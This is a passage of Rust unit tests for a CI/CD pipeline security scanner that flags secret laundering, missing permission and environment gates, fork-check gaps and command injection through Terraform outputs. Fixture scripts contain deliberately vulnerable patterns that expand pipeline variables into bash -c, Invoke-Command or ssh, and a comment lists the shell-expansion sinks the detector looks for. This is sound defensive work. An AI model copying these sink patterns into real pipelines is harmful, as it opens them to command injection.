9378            findings[0].message.contains("deploy"),
9379            "message must name the consumer step"
9380        );
9381    }
9382
9383    #[test]
9384    fn env_gate_writer_then_first_party_reader_does_not_fire() {
9385        // First-party consumer is the legitimate use of $GITHUB_ENV — the
9386        // entire point of the gate. Only flagged when the consumer's trust
9387        // zone is reduced.
9388        let (g, _) = job_with_steps(
9389            "build",
9390            &[
9391                (
9392                    "setup",
9393                    TrustZone::FirstParty,
9394                    true,
9395                    false,
9396                    Some("CLOUD_KEY"),
9397                ),
9398                ("use-it", TrustZone::FirstParty, false, true, None),
9399            ],
9400        );
9401        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9402        assert!(
9403            findings.is_empty(),
9404            "first-party reader is the intended use; must not fire"
9405        );
9406    }
9407
9408    #[test]
9409    fn env_gate_write_of_non_secret_value_does_not_fire() {
9410        // Writer step doesn't hold any Secret/Identity — it's writing a
9411        // benign value (build version, config flag) into the env. Out of
9412        // scope: the env gate isn't laundering authority across a trust
9413        // boundary because there's no authority to launder.
9414        let (g, _) = job_with_steps(
9415            "build",
9416            &[
9417                ("setup", TrustZone::FirstParty, true, false, None),
9418                ("deploy", TrustZone::Untrusted, false, true, None),
9419            ],
9420        );
9421        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9422        assert!(
9423            findings.is_empty(),
9424            "env-gate write of non-authority value must not fire"
9425        );
9426    }
9427
9428    #[test]
9429    fn writer_in_different_job_does_not_fire() {
9430        // The env gate only propagates within a job — a writer in job A
9431        // cannot reach a consumer in job B even if both jobs run on the
9432        // same runner. Same-job constraint enforced via META_JOB_NAME.
9433        let mut g = AuthorityGraph::new(source("ci.yml"));
9434        let secret = g.add_node(NodeKind::Secret, "CLOUD_KEY", TrustZone::FirstParty);
9435
9436        let mut writer_meta = std::collections::HashMap::new();
9437        writer_meta.insert(META_JOB_NAME.into(), "build".into());
9438        writer_meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
9439        let writer =
9440            g.add_node_with_metadata(NodeKind::Step, "setup", TrustZone::FirstParty, writer_meta);
9441        g.add_edge(writer, secret, EdgeKind::HasAccessTo);
9442
9443        let mut consumer_meta = std::collections::HashMap::new();
9444        consumer_meta.insert(META_JOB_NAME.into(), "deploy".into()); // DIFFERENT job
9445        consumer_meta.insert(META_READS_ENV.into(), "true".into());
9446        g.add_node_with_metadata(
9447            NodeKind::Step,
9448            "remote-deploy",
9449            TrustZone::Untrusted,
9450            consumer_meta,
9451        );
9452
9453        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9454        assert!(
9455            findings.is_empty(),
9456            "cross-job writer/consumer pair must not fire — same-job constraint"
9457        );
9458    }
9459
9460    #[test]
9461    fn writer_after_consumer_in_same_job_does_not_fire() {
9462        // Declaration order matters: a writer that comes AFTER the
9463        // consumer can't have populated the env the consumer read. Without
9464        // this ordering check the rule would over-fire on any same-job
9465        // write/read pair.
9466        let (g, _) = job_with_steps(
9467            "build",
9468            &[
9469                ("deploy", TrustZone::Untrusted, false, true, None),
9470                (
9471                    "setup",
9472                    TrustZone::FirstParty,
9473                    true,
9474                    false,
9475                    Some("CLOUD_KEY"),
9476                ),
9477            ],
9478        );
9479        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9480        assert!(
9481            findings.is_empty(),
9482            "writer that runs after the consumer cannot launder into it"
9483        );
9484    }
9485
9486    #[test]
9487    fn third_party_consumer_also_fires() {
9488        // ThirdParty (SHA-pinned marketplace action) is still in scope —
9489        // the action's code is immutable but it can still receive and
9490        // exfiltrate the laundered secret.
9491        let (g, _) = job_with_steps(
9492            "build",
9493            &[
9494                (
9495                    "setup",
9496                    TrustZone::FirstParty,
9497                    true,
9498                    false,
9499                    Some("CLOUD_KEY"),
9500                ),
9501                (
9502                    "third-party-deploy",
9503                    TrustZone::ThirdParty,
9504                    false,
9505                    true,
9506                    None,
9507                ),
9508            ],
9509        );
9510        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9511        assert_eq!(findings.len(), 1);
9512    }
9513
9514    #[test]
9515    fn rule_appears_in_run_all_rules() {
9516        // run_all_rules wires every rule in the catalogue — assert the
9517        // new one is hooked up so it actually fires from the CLI scan path.
9518        let (g, _) = job_with_steps(
9519            "build",
9520            &[
9521                (
9522                    "setup",
9523                    TrustZone::FirstParty,
9524                    true,
9525                    false,
9526                    Some("CLOUD_KEY"),
9527                ),
9528                ("deploy", TrustZone::Untrusted, false, true, None),
9529            ],
9530        );
9531        let findings = run_all_rules(&g, 4);
9532        assert!(
9533            findings
9534                .iter()
9535                .any(|f| f.category == FindingCategory::SecretViaEnvGateToUntrustedConsumer),
9536            "secret_via_env_gate_to_untrusted_consumer must run via run_all_rules"
9537        );
9538    }
9539
9540    // ── no_workflow_level_permissions_block ──────────────────
9541
9542    fn graph_with_platform(platform: &str, file: &str) -> AuthorityGraph {
9543        let mut g = AuthorityGraph::new(source(file));
9544        g.metadata.insert(META_PLATFORM.into(), platform.into());
9545        g
9546    }
9547
9548    #[test]
9549    fn no_workflow_perms_fires_on_gha_when_marker_present_and_no_token_identity() {
9550        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9551        g.metadata
9552            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9553        // A real workflow always has at least one Step. The empty-graph
9554        // guard inside the rule excludes mis-classified variable-only YAML.
9555        g.add_node(NodeKind::Step, "build[0]", TrustZone::FirstParty);
9556        // No GITHUB_TOKEN identity nodes at all (parser would skip creating
9557        // them when there's no permissions block anywhere).
9558
9559        let findings = no_workflow_level_permissions_block(&g);
9560        assert_eq!(findings.len(), 1);
9561        assert_eq!(findings[0].severity, Severity::Medium);
9562        assert_eq!(
9563            findings[0].category,
9564            FindingCategory::NoWorkflowLevelPermissionsBlock
9565        );
9566    }
9567
9568    #[test]
9569    fn no_workflow_perms_does_not_fire_on_empty_graph() {
9570        // Empty graph (variable-only YAML mis-detected as GHA, parse
9571        // failure, etc.) has no real authority surface — must skip.
9572        let mut g = graph_with_platform("github-actions", "vars.yml");
9573        g.metadata
9574            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9575        assert!(no_workflow_level_permissions_block(&g).is_empty());
9576    }
9577
9578    #[test]
9579    fn no_workflow_perms_does_not_fire_when_a_job_declares_permissions() {
9580        // Workflow has no top-level permissions, but one job does — the rule
9581        // must not fire because the per-job override is what runs.
9582        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9583        g.metadata
9584            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9585        let mut meta = std::collections::HashMap::new();
9586        meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
9587        meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
9588        g.add_node_with_metadata(
9589            NodeKind::Identity,
9590            "GITHUB_TOKEN (build)",
9591            TrustZone::FirstParty,
9592            meta,
9593        );
9594
9595        let findings = no_workflow_level_permissions_block(&g);
9596        assert!(findings.is_empty());
9597    }
9598
9599    #[test]
9600    fn no_workflow_perms_does_not_fire_on_ado_or_gitlab() {
9601        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9602        g.metadata
9603            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9604        assert!(no_workflow_level_permissions_block(&g).is_empty());
9605
9606        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9607        g.metadata
9608            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
9609        assert!(no_workflow_level_permissions_block(&g).is_empty());
9610    }
9611
9612    // ── prod_deploy_job_no_environment_gate ───────────────────
9613
9614    #[test]
9615    fn prod_deploy_no_env_gate_fires_on_ado_prod_sc_without_env_marker() {
9616        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9617        step_with_meta(
9618            &mut g,
9619            "AzureCLI : Deploy",
9620            &[(META_SERVICE_CONNECTION_NAME, "platform-prod-sc")],
9621        );
9622        let findings = prod_deploy_job_no_environment_gate(&g);
9623        assert_eq!(findings.len(), 1);
9624        assert_eq!(findings[0].severity, Severity::High);
9625        assert_eq!(
9626            findings[0].category,
9627            FindingCategory::ProdDeployJobNoEnvironmentGate
9628        );
9629        assert!(findings[0].message.contains("platform-prod-sc"));
9630    }
9631
9632    #[test]
9633    fn prod_deploy_no_env_gate_skips_when_env_marker_present() {
9634        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9635        step_with_meta(
9636            &mut g,
9637            "AzureCLI : Deploy",
9638            &[
9639                (META_SERVICE_CONNECTION_NAME, "platform-prod-sc"),
9640                (META_ENV_APPROVAL, "true"),
9641            ],
9642        );
9643        assert!(prod_deploy_job_no_environment_gate(&g).is_empty());
9644    }
9645
9646    #[test]
9647    fn prod_deploy_no_env_gate_skips_dev_connection() {
9648        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9649        step_with_meta(
9650            &mut g,
9651            "AzureCLI : Deploy",
9652            &[(META_SERVICE_CONNECTION_NAME, "platform-dev-sc")],
9653        );
9654        assert!(prod_deploy_job_no_environment_gate(&g).is_empty());
9655    }
9656
9657    #[test]
9658    fn prod_deploy_no_env_gate_via_edge_to_prod_identity() {
9659        let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
9660        let step = step_with_meta(&mut g, "AzureCLI : Deploy", &[]);
9661        let mut id_meta = std::collections::HashMap::new();
9662        id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
9663        let conn = g.add_node_with_metadata(
9664            NodeKind::Identity,
9665            "alz-infra-sc-prd-uks",
9666            TrustZone::FirstParty,
9667            id_meta,
9668        );
9669        g.add_edge(step, conn, EdgeKind::HasAccessTo);
9670        let findings = prod_deploy_job_no_environment_gate(&g);
9671        assert_eq!(findings.len(), 1);
9672        assert!(findings[0].message.contains("alz-infra-sc-prd-uks"));
9673    }
9674
9675    // ── long_lived_secret_without_oidc_recommendation ─────────
9676
9677    #[test]
9678    fn ll_secret_without_oidc_emits_for_aws_secret_with_no_oidc_in_graph() {
9679        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9680        g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
9681
9682        let findings = long_lived_secret_without_oidc_recommendation(&g);
9683        assert_eq!(findings.len(), 1);
9684        assert_eq!(findings[0].severity, Severity::Info);
9685        assert!(matches!(
9686            findings[0].recommendation,
9687            Recommendation::FederateIdentity { .. }
9688        ));
9689    }
9690
9691    #[test]
9692    fn ll_secret_without_oidc_skips_when_oidc_identity_present() {
9693        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9694        g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
9695        let mut meta = std::collections::HashMap::new();
9696        meta.insert(META_OIDC.into(), "true".into());
9697        g.add_node_with_metadata(
9698            NodeKind::Identity,
9699            "AWS/deploy-role",
9700            TrustZone::FirstParty,
9701            meta,
9702        );
9703
9704        assert!(long_lived_secret_without_oidc_recommendation(&g).is_empty());
9705    }
9706
9707    #[test]
9708    fn ll_secret_without_oidc_skips_unrecognised_secret_names() {
9709        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
9710        g.add_node(NodeKind::Secret, "INTERNAL_KEY", TrustZone::FirstParty);
9711        // Not AWS/GCP/Azure-shaped — no actionable OIDC migration path.
9712        assert!(long_lived_secret_without_oidc_recommendation(&g).is_empty());
9713    }
9714
9715    // ── pull_request_workflow_inconsistent_fork_check ─────────
9716
9717    #[test]
9718    fn inconsistent_fork_check_fires_when_one_job_guarded_one_unguarded() {
9719        let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
9720        g.metadata
9721            .insert(META_TRIGGER.into(), "pull_request".into());
9722        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9723        let s_guarded = step_with_meta(
9724            &mut g,
9725            "build[0]",
9726            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
9727        );
9728        let s_unguarded = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
9729        g.add_edge(s_guarded, secret, EdgeKind::HasAccessTo);
9730        g.add_edge(s_unguarded, secret, EdgeKind::HasAccessTo);
9731
9732        let findings = pull_request_workflow_inconsistent_fork_check(&g);
9733        assert_eq!(findings.len(), 1);
9734        assert_eq!(
9735            findings[0].category,
9736            FindingCategory::PullRequestWorkflowInconsistentForkCheck
9737        );
9738        assert!(findings[0].message.contains("deploy"));
9739        assert!(findings[0].message.contains("build"));
9740    }
9741
9742    #[test]
9743    fn inconsistent_fork_check_skips_when_all_jobs_guarded() {
9744        let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
9745        g.metadata
9746            .insert(META_TRIGGER.into(), "pull_request".into());
9747        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9748        let s1 = step_with_meta(
9749            &mut g,
9750            "build[0]",
9751            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
9752        );
9753        let s2 = step_with_meta(
9754            &mut g,
9755            "deploy[0]",
9756            &[(META_JOB_NAME, "deploy"), (META_FORK_CHECK, "true")],
9757        );
9758        g.add_edge(s1, secret, EdgeKind::HasAccessTo);
9759        g.add_edge(s2, secret, EdgeKind::HasAccessTo);
9760        assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
9761    }
9762
9763    #[test]
9764    fn inconsistent_fork_check_skips_when_no_job_guarded() {
9765        // Both unguarded → not "inconsistent" (the org never tried). Other
9766        // rules cover the underlying risk.
9767        let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
9768        g.metadata
9769            .insert(META_TRIGGER.into(), "pull_request".into());
9770        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9771        let s1 = step_with_meta(&mut g, "build[0]", &[(META_JOB_NAME, "build")]);
9772        let s2 = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
9773        g.add_edge(s1, secret, EdgeKind::HasAccessTo);
9774        g.add_edge(s2, secret, EdgeKind::HasAccessTo);
9775        assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
9776    }
9777
9778    // ── terraform_output_via_setvariable_shell_expansion ─────
9779
9780    /// Helper: add a Step node tagged with the given job and an inline
9781    /// script body. Returns the node id so the caller can wire it up.
9782    fn add_script_step_in_job(g: &mut AuthorityGraph, name: &str, job: &str, body: &str) -> NodeId {
9783        let mut meta = std::collections::HashMap::new();
9784        meta.insert(META_SCRIPT_BODY.into(), body.into());
9785        meta.insert(META_JOB_NAME.into(), job.into());
9786        g.add_node_with_metadata(NodeKind::Step, name, TrustZone::FirstParty, meta)
9787    }
9788
9789    #[test]
9790    fn tf_output_setvariable_fires_on_solarwinds_corpus_pattern() {
9791        // Faithful reproduction of the
9792        // `Azure_Landing_Zone/sharedservice-solarwinds/.pipeline/deployment.yml`
9793        // pattern (lines ~98-180 of the corpus exemplar): a PowerShell@2
9794        // step reads `$env:TF_OUT_GDSVMS` and emits
9795        // `##vso[task.setvariable variable=gdsvms]`. A later
9796        // AzurePowerShell@5 step does `"$(gdsvms)" -split ","` followed by
9797        // `Invoke-Command` against each VM in the list.
9798        let mut g = AuthorityGraph::new(source("ado.yml"));
9799        add_script_step_in_job(
9800            &mut g,
9801            "capture-tf-outputs",
9802            "Deployment_Apply",
9803            "Write-Host \"TF_OUT_GDSVMS: $env:TF_OUT_GDSVMS\"\n\
9804             Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"\n\
9805             Write-Host \"##vso[task.setvariable variable=amlinvms]$env:TF_OUT_AMLINVMS\"",
9806        );
9807        add_script_step_in_job(
9808            &mut g,
9809            "join-vms-to-domain",
9810            "Deployment_Apply",
9811            "$GDSvmNames = \"$(gdsvms)\" -split \",\"\n\
9812             foreach ($vmName in $GDSvmNames) {\n\
9813               Invoke-Command -ComputerName $vmName -ScriptBlock { Add-Computer }\n\
9814             }",
9815        );
9816
9817        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9818        // Two captured variables (gdsvms, amlinvms) but only `gdsvms` is
9819        // referenced in the sink — exactly one finding.
9820        assert_eq!(findings.len(), 1, "got: {findings:#?}");
9821        assert_eq!(findings[0].severity, Severity::High);
9822        assert_eq!(
9823            findings[0].category,
9824            FindingCategory::TerraformOutputViaSetvariableShellExpansion
9825        );
9826        assert!(findings[0].message.contains("gdsvms"));
9827        assert!(findings[0].nodes_involved.len() == 2);
9828    }
9829
9830    #[test]
9831    fn tf_output_setvariable_fires_on_literal_terraform_output_cli() {
9832        // Variant: the capture step actually shells out to
9833        // `terraform output -raw vm_names` instead of going through the
9834        // `TF_OUT_*` env-var convention. Sink uses bash -c "$(NAME)".
9835        let mut g = AuthorityGraph::new(source("ado.yml"));
9836        add_script_step_in_job(
9837            &mut g,
9838            "tf-capture",
9839            "deploy",
9840            "VMS=$(terraform output -raw vm_names)\n\
9841             echo \"##vso[task.setvariable variable=vms;]$VMS\"",
9842        );
9843        add_script_step_in_job(
9844            &mut g,
9845            "tf-consume",
9846            "deploy",
9847            "bash -c \"for vm in $(vms); do ssh $vm uptime; done\"",
9848        );
9849
9850        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9851        assert_eq!(findings.len(), 1, "got: {findings:#?}");
9852        assert!(findings[0].message.contains("vms"));
9853    }
9854
9855    #[test]
9856    fn tf_output_setvariable_skips_when_only_phase_one_present() {
9857        // Capture step exists, but no later step in the same job ever
9858        // references the captured variable in shell-expansion position.
9859        let mut g = AuthorityGraph::new(source("ado.yml"));
9860        add_script_step_in_job(
9861            &mut g,
9862            "capture",
9863            "deploy",
9864            "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
9865        );
9866        add_script_step_in_job(
9867            &mut g,
9868            "innocuous-print",
9869            "deploy",
9870            "Write-Host 'Deployment complete.'",
9871        );
9872
9873        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9874        assert!(
9875            findings.is_empty(),
9876            "phase-1-only must not fire; got: {findings:#?}"
9877        );
9878    }
9879
9880    #[test]
9881    fn tf_output_setvariable_skips_when_only_phase_two_present() {
9882        // Sink step uses $(gdsvms) in shell-expansion position, but no
9883        // earlier step in the same job ever captured a terraform output
9884        // and emitted a setvariable for that name. Variable might be
9885        // defined elsewhere (variable group, vars yaml) — out of scope.
9886        let mut g = AuthorityGraph::new(source("ado.yml"));
9887        add_script_step_in_job(&mut g, "noop-first", "deploy", "echo 'starting deploy'");
9888        add_script_step_in_job(
9889            &mut g,
9890            "consume-only",
9891            "deploy",
9892            "$names = \"$(gdsvms)\" -split \",\"\n\
9893             foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
9894        );
9895
9896        let findings = terraform_output_via_setvariable_shell_expansion(&g);
9897        assert!(
9898            findings.is_empty(),
9899            "phase-2-only must not fire; got: {findings:#?}"
9900        );
9901    }
9902
9903    #[test]
9904    fn inconsistent_fork_check_skips_non_pr_trigger() {
9905        let mut g = graph_with_platform("github-actions", ".github/workflows/push.yml");
9906        g.metadata.insert(META_TRIGGER.into(), "push".into());
9907        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
9908        let s1 = step_with_meta(
9909            &mut g,
9910            "build[0]",
9911            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
9912        );
9913        let s2 = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
9914        g.add_edge(s1, secret, EdgeKind::HasAccessTo);
9915        g.add_edge(s2, secret, EdgeKind::HasAccessTo);
9916        assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
9917    }
9918
9919    // ── gitlab_deploy_job_missing_protected_branch_only ────────
9920
9921    #[test]
9922    fn gitlab_deploy_no_protected_only_fires_on_prod_env_without_marker() {
9923        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9924        step_with_meta(&mut g, "deploy-prod", &[("environment_name", "production")]);
9925        let findings = gitlab_deploy_job_missing_protected_branch_only(&g);
9926        assert_eq!(findings.len(), 1);
9927        assert_eq!(findings[0].severity, Severity::Medium);
9928        assert_eq!(
9929            findings[0].category,
9930            FindingCategory::GitlabDeployJobMissingProtectedBranchOnly
9931        );
9932    }
9933
9934    #[test]
9935    fn gitlab_deploy_no_protected_only_skips_when_marker_present() {
9936        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9937        step_with_meta(
9938            &mut g,
9939            "deploy-prod",
9940            &[
9941                ("environment_name", "production"),
9942                (META_RULES_PROTECTED_ONLY, "true"),
9943            ],
9944        );
9945        assert!(gitlab_deploy_job_missing_protected_branch_only(&g).is_empty());
9946    }
9947
9948    #[test]
9949    fn gitlab_deploy_no_protected_only_skips_dev_environment() {
9950        let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
9951        step_with_meta(&mut g, "deploy-staging", &[("environment_name", "staging")]);
9952        assert!(gitlab_deploy_job_missing_protected_branch_only(&g).is_empty());
9953    }
9954
9955    // ── compensating-control suppressions ─────────────────────
9956
9957    #[test]
9958    fn suppression_checkout_pr_downgraded_when_no_privileged_steps_in_job() {
9959        // Build a graph where checkout_self_pr_exposure would fire BUT the
9960        // job has no secret access and no env-gate writes.
9961        let mut g = graph_with_platform("github-actions", ".github/workflows/lint.yml");
9962        g.metadata
9963            .insert(META_TRIGGER.into(), "pull_request_target".into());
9964        let _checkout = step_with_meta(
9965            &mut g,
9966            "lint[0]",
9967            &[(META_JOB_NAME, "lint"), (META_CHECKOUT_SELF, "true")],
9968        );
9969        // A second non-privileged step in the same job.
9970        step_with_meta(&mut g, "lint[1]", &[(META_JOB_NAME, "lint")]);
9971
9972        let mut findings = checkout_self_pr_exposure(&g);
9973        assert_eq!(findings.len(), 1);
9974        assert_eq!(findings[0].severity, Severity::High); // pre-suppression
9975        apply_compensating_controls(&g, &mut findings);
9976        assert_eq!(
9977            findings[0].severity,
9978            Severity::Info,
9979            "checkout in a job with no privileged steps must downgrade to Info"
9980        );
9981        assert!(findings[0].message.contains("downgraded"));
9982    }
9983
9984    #[test]
9985    fn suppression_checkout_pr_unchanged_when_job_has_privileged_step() {
9986        let mut g = graph_with_platform("github-actions", ".github/workflows/build.yml");
9987        g.metadata
9988            .insert(META_TRIGGER.into(), "pull_request_target".into());
9989        let secret = g.add_node(NodeKind::Secret, "DEPLOY_TOKEN", TrustZone::FirstParty);
9990        let checkout = step_with_meta(
9991            &mut g,
9992            "build[0]",
9993            &[(META_JOB_NAME, "build"), (META_CHECKOUT_SELF, "true")],
9994        );
9995        let priv_step = step_with_meta(&mut g, "build[1]", &[(META_JOB_NAME, "build")]);
9996        g.add_edge(priv_step, secret, EdgeKind::HasAccessTo);
9997        // checkout step itself has no edges
9998        let _ = checkout;
9999
10000        let mut findings = checkout_self_pr_exposure(&g);
10001        assert_eq!(findings.len(), 1);
10002        let pre = findings[0].severity;
10003        apply_compensating_controls(&g, &mut findings);
10004        assert_eq!(
10005            findings[0].severity, pre,
10006            "must NOT downgrade when same job has privileged steps"
10007        );
10008    }
10009
10010    #[test]
10011    fn suppression_trigger_context_downgraded_when_all_priv_jobs_fork_checked() {
10012        // pull_request_target trigger + every privileged step has fork-check.
10013        let mut g = graph_with_platform("github-actions", ".github/workflows/prt.yml");
10014        g.metadata
10015            .insert(META_TRIGGER.into(), "pull_request_target".into());
10016        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
10017        let s = step_with_meta(
10018            &mut g,
10019            "build[0]",
10020            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
10021        );
10022        g.add_edge(s, secret, EdgeKind::HasAccessTo);
10023
10024        let mut findings = trigger_context_mismatch(&g);
10025        assert_eq!(findings.len(), 1);
10026        assert_eq!(findings[0].severity, Severity::Critical);
10027        apply_compensating_controls(&g, &mut findings);
10028        assert_eq!(
10029            findings[0].severity,
10030            Severity::Medium,
10031            "trigger_context_mismatch must downgrade Critical → Medium when fork-check universal"
10032        );
10033        assert!(findings[0].message.contains("downgraded"));
10034    }
10035
10036    #[test]
10037    fn suppression_trigger_context_unchanged_when_some_priv_steps_unguarded() {
10038        let mut g = graph_with_platform("github-actions", ".github/workflows/prt.yml");
10039        g.metadata
10040            .insert(META_TRIGGER.into(), "pull_request_target".into());
10041        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
10042        let s_guard = step_with_meta(
10043            &mut g,
10044            "build[0]",
10045            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
10046        );
10047        let s_no_guard = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
10048        g.add_edge(s_guard, secret, EdgeKind::HasAccessTo);
10049        g.add_edge(s_no_guard, secret, EdgeKind::HasAccessTo);
10050
10051        let mut findings = trigger_context_mismatch(&g);
10052        let pre = findings[0].severity;
10053        apply_compensating_controls(&g, &mut findings);
10054        assert_eq!(findings[0].severity, pre);
10055    }
10056
10057    #[test]
10058    fn suppression_overpriv_identity_demoted_when_job_has_narrow_override() {
10059        // Workflow-level GITHUB_TOKEN is broad; one job has constrained override.
10060        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
10061        let mut wf_meta = std::collections::HashMap::new();
10062        wf_meta.insert(META_PERMISSIONS.into(), "write-all".into());
10063        wf_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
10064        let wf_token = g.add_node_with_metadata(
10065            NodeKind::Identity,
10066            "GITHUB_TOKEN",
10067            TrustZone::FirstParty,
10068            wf_meta,
10069        );
10070        let mut job_meta = std::collections::HashMap::new();
10071        job_meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
10072        job_meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
10073        g.add_node_with_metadata(
10074            NodeKind::Identity,
10075            "GITHUB_TOKEN (build)",
10076            TrustZone::FirstParty,
10077            job_meta,
10078        );
10079        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
10080        g.add_edge(step, wf_token, EdgeKind::HasAccessTo);
10081
10082        let mut findings = over_privileged_identity(&g);
10083        // Filter to only the workflow-level finding (the constrained job-level
10084        // override won't fire over_privileged_identity by itself).
10085        let wf_findings_count = findings
10086            .iter()
10087            .filter(|f| {
10088                f.nodes_involved
10089                    .first()
10090                    .and_then(|id| g.node(*id))
10091                    .map(|n| n.name == "GITHUB_TOKEN")
10092                    .unwrap_or(false)
10093            })
10094            .count();
10095        assert_eq!(wf_findings_count, 1);
10096        apply_compensating_controls(&g, &mut findings);
10097        let demoted = findings.iter().find(|f| {
10098            f.nodes_involved
10099                .first()
10100                .and_then(|id| g.node(*id))
10101                .map(|n| n.name == "GITHUB_TOKEN")
10102                .unwrap_or(false)
10103        });
10104        let demoted = demoted.expect("workflow-level token finding still present");
10105        assert_eq!(
10106            demoted.severity,
10107            Severity::Info,
10108            "workflow-level over_priv must downgrade to Info when narrower job override exists"
10109        );
10110        assert!(demoted.message.contains("suppressed"));
10111    }
10112
10113    #[test]
10114    fn tf_output_setvariable_skips_when_sink_quotes_in_env_block() {
10115        // Sink step references `$(gdsvms)` only in `echo "$(gdsvms)"` —
10116        // a context with no shell-expansion sigils (no bash -c, no eval,
10117        // no Invoke-Command, no -split, no command substitution, not
10118        // line-leading). The value is quoted by the shell on its way
10119        // into echo's argv and never reaches an interpreter.
10120        let mut g = AuthorityGraph::new(source("ado.yml"));
10121        add_script_step_in_job(
10122            &mut g,
10123            "capture",
10124            "deploy",
10125            "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
10126        );
10127        add_script_step_in_job(
10128            &mut g,
10129            "safe-echo",
10130            "deploy",
10131            "echo \"gdsvms is: $(gdsvms)\"",
10132        );
10133
10134        let findings = terraform_output_via_setvariable_shell_expansion(&g);
10135        assert!(
10136            findings.is_empty(),
10137            "properly-quoted echo must not fire; got: {findings:#?}"
10138        );
10139    }
10140
10141    #[test]
10142    fn tf_output_setvariable_skips_when_sink_in_different_job() {
10143        // Capture and sink exist, but in different jobs. Pipeline
10144        // variable scoping in ADO is per-stage/per-job by default — the
10145        // chain doesn't compose without explicit cross-job output
10146        // wiring (which is a separate primitive).
10147        let mut g = AuthorityGraph::new(source("ado.yml"));
10148        add_script_step_in_job(
10149            &mut g,
10150            "capture",
10151            "job-a",
10152            "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
10153        );
10154        add_script_step_in_job(
10155            &mut g,
10156            "consume",
10157            "job-b",
10158            "$names = \"$(gdsvms)\" -split \",\"\n\
10159             foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
10160        );
10161
10162        let findings = terraform_output_via_setvariable_shell_expansion(&g);
10163        assert!(
10164            findings.is_empty(),
10165            "cross-job chain must not fire; got: {findings:#?}"
10166        );
10167    }
10168
10169    #[test]
10170    fn tf_output_setvariable_skips_when_setvariable_lacks_tf_capture_signal() {
10171        // Inline script emits `task.setvariable` but the source value is
10172        // a plain pipeline variable, not anything terraform-shaped.
10173        // Without a TF_OUT_* / `terraform output` capture signal in the
10174        // body, the rule must not fire — `self_mutating_pipeline`
10175        // already covers the generic setvariable primitive.
10176        let mut g = AuthorityGraph::new(source("ado.yml"));
10177        add_script_step_in_job(
10178            &mut g,
10179            "pure-setvar",
10180            "deploy",
10181            "Write-Host \"##vso[task.setvariable variable=gdsvms]$(BuildId)\"",
10182        );
10183        add_script_step_in_job(
10184            &mut g,
10185            "consume",
10186            "deploy",
10187            "$names = \"$(gdsvms)\" -split \",\"\n\
10188             foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
10189        );
10190
